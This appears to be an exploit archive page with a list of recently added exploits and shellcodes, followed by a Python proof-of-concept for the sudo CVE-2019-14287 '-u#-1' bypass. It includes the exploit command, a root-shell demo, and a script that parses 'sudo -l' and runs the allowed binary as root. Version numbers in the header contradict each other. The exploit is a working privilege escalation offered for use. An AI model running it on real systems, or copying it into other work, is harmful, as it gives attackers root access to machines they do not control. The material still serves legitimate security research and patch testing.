588067072a
15 changes to exploits/shellcodes sudo 1.8.28 - Security Bypass sudo 1.2.27 - Security Bypass Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path X.Org X Server 1.20.4 - Local Stack Overflow LiteManager 4.5.0 - 'romservice' Unquoted Serive Path Solaris xscreensaver 11.4 - Privilege Escalation Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path Whatsapp 2.19.216 - Remote Code Execution Accounts Accounting 7.02 - Persistent Cross-Site Scripting CyberArk Password Vault 10.6 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
80 lines
No EOL
1.6 KiB
Python
Executable file
80 lines
No EOL
1.6 KiB
Python
Executable file
# Exploit Title : sudo 1.8.27 - Security Bypass
|
|
# Date : 2019-10-15
|
|
# Original Author: Joe Vennix
|
|
# Exploit Author : Mohin Paramasivam
|
|
# Version : Sudo <1.2.28
|
|
# Tested on Linux
|
|
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
|
|
# Fix : The bug is fixed in sudo 1.8.28
|
|
# CVE : 2019-14287
|
|
|
|
'''Check for the user sudo permissions
|
|
|
|
sudo -l
|
|
|
|
User hacker may run the following commands on kali:
|
|
(ALL, !root) /bin/bash
|
|
|
|
|
|
So user hacker can't run /bin/bash as root (!root)
|
|
|
|
|
|
User hacker sudo privilege in /etc/sudoers
|
|
|
|
# User privilege specification
|
|
root ALL=(ALL:ALL) ALL
|
|
|
|
hacker ALL=(ALL,!root) /bin/bash
|
|
|
|
|
|
With ALL specified, user hacker can run the binary /bin/bash as any user
|
|
|
|
EXPLOIT:
|
|
|
|
sudo -u#-1 /bin/bash
|
|
|
|
Example :
|
|
|
|
hacker@kali:~$ sudo -u#-1 /bin/bash
|
|
root@kali:/home/hacker# id
|
|
uid=0(root) gid=1000(hacker) groups=1000(hacker)
|
|
root@kali:/home/hacker#
|
|
|
|
Description :
|
|
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
|
|
-u#-1 returns as 0 which is root's id
|
|
|
|
and /bin/bash is executed with root permission
|
|
Proof of Concept Code :
|
|
|
|
How to use :
|
|
python3 sudo_exploit.py
|
|
|
|
'''
|
|
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import os
|
|
|
|
#Get current username
|
|
|
|
username = input("Enter current username :")
|
|
|
|
|
|
#check which binary the user can run with sudo
|
|
|
|
os.system("sudo -l > priv")
|
|
|
|
|
|
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
|
|
|
|
binary_file = open("binary")
|
|
|
|
binary= binary_file.read()
|
|
|
|
#execute sudo exploit
|
|
|
|
print("Lets hope it works")
|
|
|
|
os.system("sudo -u#-1 "+ binary) |